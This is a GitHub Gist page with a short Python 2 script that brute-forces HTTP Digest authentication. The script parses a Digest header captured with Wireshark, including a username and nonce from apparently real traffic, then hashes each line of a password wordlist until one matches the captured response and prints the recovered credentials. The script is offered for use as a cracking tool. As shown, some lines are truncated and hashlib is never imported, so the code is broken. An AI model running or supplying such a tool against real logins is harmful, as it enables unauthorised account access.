Last active
August 29, 2015 14:18
-
-
Save MrAwesomeness/0a7f8e505b1ec5e21da6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Using Python Version 2.7.3 | |
| #module used to do regular expressions | |
| import re | |
| #replace string with wireshark output | |
| string = 'Digest username=\"infod\", realm=\"members only\", nonce=\"V8XwF3IRBQA=a0d05646a399aacfd52$ | |
| #Prompt to get user input | |
| method = raw_input("Method (POST/GET): ") | |
| password_File = raw_input("Password File Path: ") | |
| #Regular expression used to get realm variable | |
| pos1 = re.search('realm=',string) | |
| regex1 = pos1.end()+1 | |
| #Regular expression to get nonce varialbe | |
| pos2 = re.search('nonce=',string) | |
| regex2 = pos2.start()-3 | |
| #Regular expressions to get the rest of the variables | |
| raw_Username = re.search('username=\"(\w+)',string).group(0) | |
| realm =string[regex1:regex2] | |
| raw_Nonce = re.search('nonce=\"(\S+)',string).group(0) | |
| nonce_End = len(raw_Nonce) | |
| raw_Uri = re.search('uri="(\S+)',string).group(0) | |
| uri_End = len(raw_Uri) | |
| raw_Qop = re.search('qop=(\w+)',string).group(0) | |
| raw_Nc = re.search('nc=(\w+)',string).group(0) | |
| raw_Cnonce = re.search('cnonce="(\w+)',string).group(0) | |
| raw_Response = re.search('response="(\w+)',string).group(0) | |
| #Process to set variables so they only have needed string | |
| username = raw_Username[10:] | |
| nonce = raw_Nonce[7:nonce_End - 2] | |
| uri = raw_Uri[5:uri_End - 2] | |
| qop = raw_Qop[4:] | |
| nc = raw_Nc[3:] | |
| cnonce = raw_Cnonce[8:] | |
| response = raw_Response[10:] | |
| #Importing the module to use MD5 hash | |
| #creating the hashes for digest calculation | |
| inputData2 = (method + ":" + uri).encode('utf-8') | |
| hash2 = (hashlib.md5(inputData2).hexdigest()) | |
| #Opens file, sets the first line the to password, completes the digest algorithm | |
| #If the if the password is the correct one, the hash will match the response from | |
| #Wire Shark and the usernane and password is printed to the console | |
| with open(password_File) as f: | |
| for line in f: | |
| password = line.rstrip() | |
| str(password) | |
| inputData1 = (username + ":" + realm + ":" + password).encode('utf-8') | |
| hash1 = (hashlib.md5(inputData1).hexdigest()) | |
| final_Hash = (hash1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + hash$ | |
| complete_Hash = (hashlib.md5(final_Hash).hexdigest()) | |
| if complete_Hash == response: | |
| print ("username: " + username + "\n" + "password: " + password) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment